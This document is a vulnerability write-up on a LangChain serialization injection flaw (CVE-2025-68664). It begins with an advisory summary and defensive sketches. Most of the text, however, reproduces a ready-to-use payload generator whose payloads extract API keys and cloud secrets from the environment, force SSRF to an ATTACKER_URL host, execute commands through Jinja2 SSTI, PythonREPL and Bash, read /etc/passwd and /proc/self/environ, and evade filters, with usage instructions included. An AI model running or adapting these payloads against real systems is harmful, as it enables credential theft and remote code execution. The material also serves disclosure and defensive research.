LangChain serialization injection vulnerability allows secret extraction through the dump/load APIs (CVE-2025-68664)

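Summary

A serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions. When serializing free-form dictionaries, these functions do not escape dictionaries that contain an 'lc' key. LangChain uses the 'lc' key internally to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than as plain user data.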
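
To make the ambiguity concrete, here is a minimal sketch in plain Python (no LangChain import) of a shape check. The helper name looks_like_lc_object and the LC_TYPES set are illustrative assumptions, built only from the marker types that appear in the payloads later in this article. It is not LangChain's own detection logic.

```python
from typing import Any

# Marker types that appear in the payloads shown in this article.
LC_TYPES = {"secret", "constructor"}


def looks_like_lc_object(value: Any) -> bool:
    """Return True if a plain dict has the shape of a serialized-object marker."""
    return (
        isinstance(value, dict)
        and "lc" in value
        and value.get("type") in LC_TYPES
    )


# A user-supplied dict that happens to carry the marker structure...
user_metadata = {"lc": 1, "type": "secret", "id": ["OPENAI_API_KEY"]}
# ...and an ordinary one.
plain_metadata = {"source": "upload.pdf", "page": 3}

print(looks_like_lc_object(user_metadata))   # True
print(looks_like_lc_object(plain_metadata))  # False
```

Once both dictionaries are written out as JSON, nothing distinguishes the first one from an object that LangChain itself serialized, which is why the missing escaping step matters.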

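Attack surface

The core vulnerability is in dumps() and dumpd(): these functions fail to escape user-controlled dictionaries that contain an 'lc' key. When this unescaped data is later deserialized through load() or loads(), the injected structure is treated as a legitimate LangChain object rather than as plain user data.

This escaping bug enables several attack vectors:

  1. Injection through user data: malicious LangChain object structures can be injected through user-controlled fields such as metadata, additional_kwargs, and response_metadata.
  2. Class instantiation within trusted namespaces: an injected manifest can instantiate any Serializable subclass, but only within the pre-approved trusted namespaces (langchain_core, langchain, langchain_community). This includes classes whose __init__ has side effects (network calls, file operations, and so on). Note that namespace validation was already enforced before this patch, so arbitrary classes outside these trusted namespaces could not be instantiated.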
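
As a defensive illustration of the two vectors above, the following sketch walks a message-like dictionary, reports every nested dict that carries an 'lc' key, and checks whether its id path starts with one of the three namespaces named in the list. The function names, the path notation, and the sample message are hypothetical. The real namespace validation lives inside LangChain's loader and may differ in detail.

```python
from typing import Any, Iterator, Tuple

# Namespaces named in the advisory text above.
TRUSTED_NAMESPACES = {"langchain_core", "langchain", "langchain_community"}


def find_lc_markers(data: Any, path: str = "$") -> Iterator[Tuple[str, dict]]:
    """Yield (path, dict) for every nested dict that carries an 'lc' key."""
    if isinstance(data, dict):
        if "lc" in data:
            yield path, data
        for key, value in data.items():
            yield from find_lc_markers(value, f"{path}.{key}")
    elif isinstance(data, (list, tuple)):
        for index, item in enumerate(data):
            yield from find_lc_markers(item, f"{path}[{index}]")


def in_trusted_namespace(manifest: dict) -> bool:
    """True if the manifest's 'id' path starts with a trusted namespace."""
    ident = manifest.get("id")
    return isinstance(ident, list) and bool(ident) and ident[0] in TRUSTED_NAMESPACES


# Hypothetical message whose user-controlled fields contain injected markers.
message = {
    "content": "normal text",
    "additional_kwargs": {
        "hidden": {"lc": 1, "type": "secret", "id": ["SECRET_KEY"]},
    },
    "response_metadata": {
        "tool": {
            "lc": 1,
            "type": "constructor",
            "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
            "kwargs": {},
        },
    },
}

hits = list(find_lc_markers(message))
for where, manifest in hits:
    print(where, manifest["type"], in_trusted_namespace(manifest))
```

A scan like this could run on untrusted input before it reaches dumps() or dumpd(), as a stopgap on versions that cannot be upgraded immediately. It does not replace the patch.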

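Security hardening

This patch fixes the escaping bug in dumps() and dumpd() and introduces new restrictive defaults in load() and loads(): allowlist enforcement through allowed_objects="core" (restricted to the serialization mappings), secrets_from_env changed from True to False, and Jinja2 templates blocked by default through init_validator. These are breaking changes for some use cases.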
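
The escaping idea can be sketched without LangChain. In the sketch below, any user dict that contains an 'lc' key is wrapped under a reserved key before serialization and unwrapped again on load, so it round-trips as plain data. The wrapper key name and both helper functions are assumptions made for illustration. The actual patch may use a different key and different rules.

```python
import json
from typing import Any

# Hypothetical wrapper key for this sketch; not taken from LangChain.
ESCAPE_KEY = "__escaped_user_dict__"


def escape_user_data(value: Any) -> Any:
    """Wrap any dict containing 'lc' so a loader cannot mistake it for a manifest."""
    if isinstance(value, dict):
        escaped = {k: escape_user_data(v) for k, v in value.items()}
        # Also wrap dicts that already use the wrapper key, so unescaping is unambiguous.
        if "lc" in value or ESCAPE_KEY in value:
            return {ESCAPE_KEY: escaped}
        return escaped
    if isinstance(value, list):
        return [escape_user_data(v) for v in value]
    return value


def unescape_user_data(value: Any) -> Any:
    """Reverse escape_user_data, returning wrapped dicts as plain data."""
    if isinstance(value, dict):
        if set(value) == {ESCAPE_KEY} and isinstance(value[ESCAPE_KEY], dict):
            inner = value[ESCAPE_KEY]
            return {k: unescape_user_data(v) for k, v in inner.items()}
        return {k: unescape_user_data(v) for k, v in value.items()}
    if isinstance(value, list):
        return [unescape_user_data(v) for v in value]
    return value


metadata = {
    "note": "hi",
    "hidden": {"lc": 1, "type": "secret", "id": ["SECRET_KEY"]},
}

escaped = escape_user_data(metadata)
wire = json.dumps(escaped)                      # what would be stored or sent
restored = unescape_user_data(json.loads(wire))

print("lc" in escaped["hidden"])  # False: the marker is no longer at this level
print(restored == metadata)       # True: the user data survives unchanged
```

The design point is that a loader which understands the wrapper returns its contents as an ordinary dictionary and never interprets them as a manifest, while the restrictive load() and loads() defaults described above limit the damage if an unescaped marker still gets through.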

Full advisory: https://github.com/advisories/GHSA-c67j-w6g6-q2cm


POC

https://github.com/Ak-cybe/CVE-2025-68664-LangGrinch-PoC

langgrinch_fuzzer.py

#!/usr/bin/env python3
"""
🎯 LangGrinch Fuzzer - CVE-2025-68664 Payload Generator & Tester
================================================================

This tool generates and tests LangChain deserialization injection payloads
for authorized security testing purposes only.

Author: Amresh Kumar (Ak-cybe)
CVE: CVE-2025-68664

⚠️ WARNING: Use only on systems you own or have explicit permission to test!
"""

import json
import argparse
import sys
from typing import List, Dict, Any
from dataclasses import dataclass
from enum import Enum


class PayloadCategory(Enum):
    """Payload categories for organized testing"""
    RECON = "reconnaissance"
    SSRF = "ssrf"
    RCE = "rce"
    FILE_READ = "file_read"
    EVASION = "evasion"


@dataclass
class Payload:
    """Represents a single exploit payload"""
    name: str
    category: PayloadCategory
    payload: Dict[str, Any]
    description: str
    risk_level: str  # low, medium, high, critical


class LangGrinchFuzzer:
    """
    LangGrinch Fuzzer - Generate and test CVE-2025-68664 payloads
    """
    
    def __init__(self):
        self.payloads: List[Payload] = []
        self._load_payloads()
    
    def _load_payloads(self):
        """Load all payload definitions"""
        
        # ========== RECONNAISSANCE PAYLOADS ==========
        recon_secrets = [
            ("HOSTNAME", "Server hostname"),
            ("OPENAI_API_KEY", "OpenAI API key"),
            ("AWS_ACCESS_KEY_ID", "AWS access key"),
            ("AWS_SECRET_ACCESS_KEY", "AWS secret key"),
            ("DATABASE_URL", "Database connection string"),
            ("REDIS_URL", "Redis connection URL"),
            ("ANTHROPIC_API_KEY", "Anthropic API key"),
            ("GOOGLE_API_KEY", "Google API key"),
            ("PINECONE_API_KEY", "Pinecone API key"),
            ("HUGGINGFACE_API_TOKEN", "HuggingFace token"),
            ("LANGCHAIN_API_KEY", "LangChain API key"),
            ("PATH", "System PATH variable"),
            ("HOME", "Home directory"),
            ("USER", "Current user"),
            ("JWT_SECRET", "JWT secret key"),
        ]
        
        for env_var, desc in recon_secrets:
            self.payloads.append(Payload(
                name=f"Secret Extraction: {env_var}",
                category=PayloadCategory.RECON,
                payload={"lc": 1, "type": "secret", "id": [env_var]},
                description=f"Extract {desc} from environment",
                risk_level="medium"
            ))
        
        # Error trigger for stack trace leak
        self.payloads.append(Payload(
            name="Error Trigger (Stack Trace Leak)",
            category=PayloadCategory.RECON,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain", "non_existent_module", "FakeClass"],
                "kwargs": {}
            },
            description="Trigger error to leak version info in stack trace",
            risk_level="low"
        ))
        
        # ========== SSRF PAYLOADS ==========
        ssrf_payloads = [
            {
                "name": "RequestsWrapper SSRF",
                "id": ["langchain_community", "utilities", "requests", "RequestsWrapper"],
                "kwargs": {"headers": {"X-Injected": "true"}}
            },
            {
                "name": "OpenAI Base URL Override",
                "id": ["langchain_community", "llms", "openai", "OpenAI"],
                "kwargs": {"openai_api_base": "http://ATTACKER_URL/", "openai_api_key": "sk-fake"}
            },
            {
                "name": "HuggingFace Endpoint",
                "id": ["langchain_community", "llms", "huggingface_endpoint", "HuggingFaceEndpoint"],
                "kwargs": {"endpoint_url": "http://ATTACKER_URL/webhook"}
            },
            {
                "name": "WebBaseLoader SSRF",
                "id": ["langchain_community", "document_loaders", "web_base", "WebBaseLoader"],
                "kwargs": {"web_path": "http://ATTACKER_URL/ssrf"}
            },
            {
                "name": "Ollama Base URL",
                "id": ["langchain_community", "llms", "ollama", "Ollama"],
                "kwargs": {"base_url": "http://ATTACKER_URL/ollama"}
            },
        ]
        
        for ssrf in ssrf_payloads:
            self.payloads.append(Payload(
                name=ssrf["name"],
                category=PayloadCategory.SSRF,
                payload={
                    "lc": 1,
                    "type": "constructor",
                    "id": ssrf["id"],
                    "kwargs": ssrf["kwargs"]
                },
                description=f"SSRF via {ssrf['name']}",
                risk_level="high"
            ))
        
        # ========== RCE PAYLOADS ==========
        self.payloads.append(Payload(
            name="PythonREPL (Critical)",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_experimental", "utilities", "python", "PythonREPL"],
                "kwargs": {}
            },
            description="Direct Python code execution via REPL",
            risk_level="critical"
        ))
        
        self.payloads.append(Payload(
            name="Jinja2 SSTI - Command Execution",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
                "kwargs": {
                    "template": "{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}",
                    "template_format": "jinja2"
                }
            },
            description="SSTI leading to OS command execution",
            risk_level="critical"
        ))
        
        self.payloads.append(Payload(
            name="BashProcess Execution",
            category=PayloadCategory.RCE,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain_experimental", "llm_bash", "bash", "BashProcess"],
                "kwargs": {}
            },
            description="Bash command execution",
            risk_level="critical"
        ))
        
        # ========== FILE READ PAYLOADS ==========
        file_read_payloads = [
            {
                "name": "CSVLoader - /etc/passwd",
                "id": ["langchain_community", "document_loaders", "csv_loader", "CSVLoader"],
                "kwargs": {"file_path": "/etc/passwd"}
            },
            {
                "name": "TextLoader - /proc/self/environ",
                "id": ["langchain_community", "document_loaders", "text", "TextLoader"],
                "kwargs": {"file_path": "/proc/self/environ"}
            },
            {
                "name": "JSONLoader - Config",
                "id": ["langchain_community", "document_loaders", "json_loader", "JSONLoader"],
                "kwargs": {"file_path": "/app/config.json", "jq_schema": "."}
            },
        ]
        
        for fr in file_read_payloads:
            self.payloads.append(Payload(
                name=fr["name"],
                category=PayloadCategory.FILE_READ,
                payload={
                    "lc": 1,
                    "type": "constructor",
                    "id": fr["id"],
                    "kwargs": fr["kwargs"]
                },
                description=f"Read file via {fr['name']}",
                risk_level="high"
            ))
        
        # ========== EVASION PAYLOADS ==========
        self.payloads.append(Payload(
            name="Nested Injection",
            category=PayloadCategory.EVASION,
            payload={
                "lc": 1,
                "type": "constructor",
                "id": ["langchain", "schema", "HumanMessage"],
                "kwargs": {
                    "content": "normal text",
                    "additional_kwargs": {
                        "hidden": {"lc": 1, "type": "secret", "id": ["SECRET_KEY"]}
                    }
                }
            },
            description="Hide payload in nested structure to bypass filters",
            risk_level="medium"
        ))
        
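        # Note: Python decodes "\u006c\u0063" to "lc" when the source is parsed,
        # so this key is identical to a literal "lc" in memory and in json.dumps output.
        self.payloads.append(Payload(
            name="Unicode Bypass",
            category=PayloadCategory.EVASION,
            payload={"\u006c\u0063": 1, "type": "secret", "id": ["API_KEY"]},
            description="Use unicode encoding to bypass simple filters",
            risk_level="medium"
        ))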
    
    def get_payloads_by_category(self, category: PayloadCategory) -> List[Payload]:
        """Get all payloads of a specific category"""
        return [p for p in self.payloads if p.category == category]
    
    def get_all_payloads(self) -> List[Payload]:
        """Get all payloads"""
        return self.payloads
    
    def generate_payload_json(self, payload: Payload, pretty: bool = True) -> str:
        """Generate JSON string for a payload"""
        if pretty:
            return json.dumps(payload.payload, indent=2)
        return json.dumps(payload.payload)
    
    def export_all_payloads(self, output_file: str = None) -> str:
        """Export all payloads to JSON"""
        export_data = []
        for p in self.payloads:
            export_data.append({
                "name": p.name,
                "category": p.category.value,
                "risk_level": p.risk_level,
                "description": p.description,
                "payload": p.payload
            })
        
        json_output = json.dumps(export_data, indent=2)
        
        if output_file:
            with open(output_file, 'w') as f:
                f.write(json_output)
            print(f"✅ Exported {len(export_data)} payloads to {output_file}")
        
        return json_output
    
    def generate_custom_secret_payload(self, env_var: str) -> Dict[str, Any]:
        """Generate a custom secret extraction payload"""
        return {"lc": 1, "type": "secret", "id": [env_var]}
    
    def generate_custom_ssrf_payload(self, target_url: str) -> Dict[str, Any]:
        """Generate a custom SSRF payload"""
        return {
            "lc": 1,
            "type": "constructor",
            "id": ["langchain_community", "utilities", "requests", "RequestsWrapper"],
            "kwargs": {"headers": {"X-Target": target_url}}
        }


def print_banner():
    """Print the tool banner"""
    banner = """
╔═══════════════════════════════════════════════════════════════════╗
║                                                                   ║
║   ██╗      █████╗ ███╗   ██╗ ██████╗  ██████╗ ██████╗ ██╗███╗   ██║
║   ██║     ██╔══██╗████╗  ██║██╔════╝ ██╔════╝ ██╔══██╗██║████╗  ██║
║   ██║     ███████║██╔██╗ ██║██║  ███╗██║  ███╗██████╔╝██║██╔██╗ ██║
║   ██║     ██╔══██║██║╚██╗██║██║   ██║██║   ██║██╔══██╗██║██║╚██╗██║
║   ███████╗██║  ██║██║ ╚████║╚██████╔╝╚██████╔╝██║  ██║██║██║ ╚████║
║   ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝
║                                                                   ║
║           🎯 LangGrinch Fuzzer - CVE-2025-68664                   ║
║           📝 Author: Amresh Kumar (Ak-cybe)                       ║
║                                                                   ║
╚═══════════════════════════════════════════════════════════════════╝
    """
    print(banner)


def main():
    """Main entry point"""
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="LangGrinch Fuzzer - CVE-2025-68664 Payload Generator",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python langgrinch_fuzzer.py --list                    # List all payloads
  python langgrinch_fuzzer.py --category recon          # Show recon payloads
  python langgrinch_fuzzer.py --export payloads.json    # Export all payloads
  python langgrinch_fuzzer.py --secret MY_API_KEY       # Generate custom secret payload
  python langgrinch_fuzzer.py --ssrf http://webhook.site/xxx  # Generate SSRF payload
        """
    )
    
    parser.add_argument('--list', '-l', action='store_true', 
                        help='List all available payloads')
    parser.add_argument('--category', '-c', type=str,
                        choices=['recon', 'ssrf', 'rce', 'file_read', 'evasion'],
                        help='Filter by payload category')
    parser.add_argument('--export', '-e', type=str,
                        help='Export all payloads to JSON file')
    parser.add_argument('--secret', '-s', type=str,
                        help='Generate custom secret extraction payload')
    parser.add_argument('--ssrf', type=str,
                        help='Generate custom SSRF payload with target URL')
    parser.add_argument('--json', '-j', action='store_true',
                        help='Output in JSON format only (no formatting)')
    
    args = parser.parse_args()
    
    fuzzer = LangGrinchFuzzer()
    
    if args.list:
        print("\n📋 Available Payloads:\n")
        print("-" * 80)
        for i, p in enumerate(fuzzer.get_all_payloads(), 1):
            risk_emoji = {"low": "🟢", "medium": "🟡", "high": "🟠", "critical": "🔴"}
            print(f"{i:2}. [{risk_emoji.get(p.risk_level, '⚪')} {p.risk_level.upper():8}] "
                  f"[{p.category.value:12}] {p.name}")
        print("-" * 80)
        print(f"\n✅ Total: {len(fuzzer.get_all_payloads())} payloads")
        return
    
    if args.category:
        category_map = {
            'recon': PayloadCategory.RECON,
            'ssrf': PayloadCategory.SSRF,
            'rce': PayloadCategory.RCE,
            'file_read': PayloadCategory.FILE_READ,
            'evasion': PayloadCategory.EVASION
        }
        category = category_map[args.category]
        payloads = fuzzer.get_payloads_by_category(category)
        
        print(f"\n📋 {category.value.upper()} Payloads:\n")
        print("-" * 80)
        for p in payloads:
            print(f"\n🎯 {p.name}")
            print(f"   Description: {p.description}")
            print(f"   Risk Level: {p.risk_level}")
            print("   Payload:")
            print(fuzzer.generate_payload_json(p))
        print("-" * 80)
        return
    
    if args.export:
        fuzzer.export_all_payloads(args.export)
        return
    
    if args.secret:
        payload = fuzzer.generate_custom_secret_payload(args.secret)
        if args.json:
            print(json.dumps(payload))
        else:
            print(f"\n🔑 Custom Secret Extraction Payload for: {args.secret}\n")
            print(json.dumps(payload, indent=2))
        return
    
    if args.ssrf:
        payload = fuzzer.generate_custom_ssrf_payload(args.ssrf)
        if args.json:
            print(json.dumps(payload))
        else:
            print(f"\n🌐 Custom SSRF Payload for: {args.ssrf}\n")
            print(json.dumps(payload, indent=2))
        return
    
    # Default: show help
    parser.print_help()


if __name__ == "__main__":
    main()

📂 Project Structure

LangGrinch-PoC/
│
├── README.md              # Main documentation & writeup
├── PAYLOADS.md            # Complete payload arsenal (55+)
├── langgrinch_fuzzer.py   # Python payload generator & tester
├── requirements.txt       # Python dependencies
└── LICENSE                # MIT License

🚀 Quick Start

Installation

# Clone the repository
git clone https://github.com/Ak-cybe/LangGrinch-PoC.git
cd LangGrinch-PoC

# Install dependencies
pip install -r requirements.txt

Usage

# List all available payloads
python langgrinch_fuzzer.py --list

# Show payloads by category
python langgrinch_fuzzer.py --category recon
python langgrinch_fuzzer.py --category ssrf
python langgrinch_fuzzer.py --category rce

# Generate custom secret extraction payload
python langgrinch_fuzzer.py --secret MY_API_KEY

# Generate custom SSRF payload
python langgrinch_fuzzer.py --ssrf http://your-webhook.com/

# Export all payloads to JSON
python langgrinch_fuzzer.py --export payloads.json

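CVE-2025-68664 (codename: LangGrinch) is a critical serialization injection vulnerability found in the LangChain Core Python package. It allows an attacker to inject malicious lc markers through LLM output or user-controlled dictionaries, which can lead to:

  1. 🔑 Extraction of environment secrets (API keys, database passwords)
  2. SSRF attacks (reaching internal services)
  3. 💀 Remote code execution (through a Jinja2 SSTI chain)
  4. File system access (reading sensitive files)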
